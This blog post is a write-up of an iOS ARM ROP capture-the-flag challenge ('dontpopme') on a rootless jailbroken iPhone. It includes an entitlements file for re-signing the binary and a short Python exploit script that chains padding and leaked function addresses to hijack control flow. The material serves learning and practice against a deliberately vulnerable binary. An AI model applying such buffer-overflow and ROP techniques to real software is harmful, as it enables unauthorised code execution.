@inversecos iOS rop chain

Some help on a rop challenge published by @inversecos #

tldr: arm, python3 and rootless jailbreak, how do I start? #

Here are the assumptions I made when I started:

  • Focus on arm related challenges as it’s the most relevant arch nowadays

  • Why would I use python2 when it’s end of life?

  • rootfull/rootless? What’s that? I have root priviledges on this iPhone

I tried @inversecos ROP challenge on a rootless jailbroken iphone

Let’s go throught my mistakes and how to get started faster

  • Let’s address rootful/rootless jailbreak: it has nothing to do with root priviledges but with the ability to write on certain directories. What are the implications for this challenge? Well /bin is quite empty and you won’t find uname so no ROP unless you find a workaround.

  • Let’s address python3 issues for low level (python will help you a lot rather than echoing by hand): Will let this great video from @liveoverflow explain it: https://www.youtube.com/watch?v=FxNS-zSS7MQ

Without relying on external packages (pwntools etc) this can be a simple way to solve the challenge

If the binary gets killed resign it with the following entitlements saved in a file called ent.xml with ldid -Sent.xml ./dontpopme

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
        "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>com.apple.private.security.no-container</key>
	<true/>
</dict>
</plist>

./dontpopme

Get the “leaked” address and do some math as explained on @inversecos’s blog post

#!/usr/bin/env python3
import sys
padding = b"A" * 37
change = #Dynamic address of change, Example: b"\x50\x3c\x9c\x04\x01\x00\x00\x00"
junk = b"\xff\xff\xff\xff\xff\xff\xff\xff"
run = #Dynamic address of run, Example: b"\x88\x3C\x9c\x04\x01\x00\x00\x00"
payload = padding + change + junk + run
sys.stdout.buffer.write(payload)

./pwnpop.py > resume.txt

Enjoy uname being run

If you’re on a rootless jailbreak you can manually patch the binary and replace /bin/uname with /bin/ps or use theos to recompile the challenge

Thoughts #

As much as this is an easy challenge in handsight, going from having done zero pwn challenges on standard and documented environments (Linux x86) left me with too many things to grasp at once, baby steps recommended!
Still, it brought me to read about theos, PAC and many cool stuff!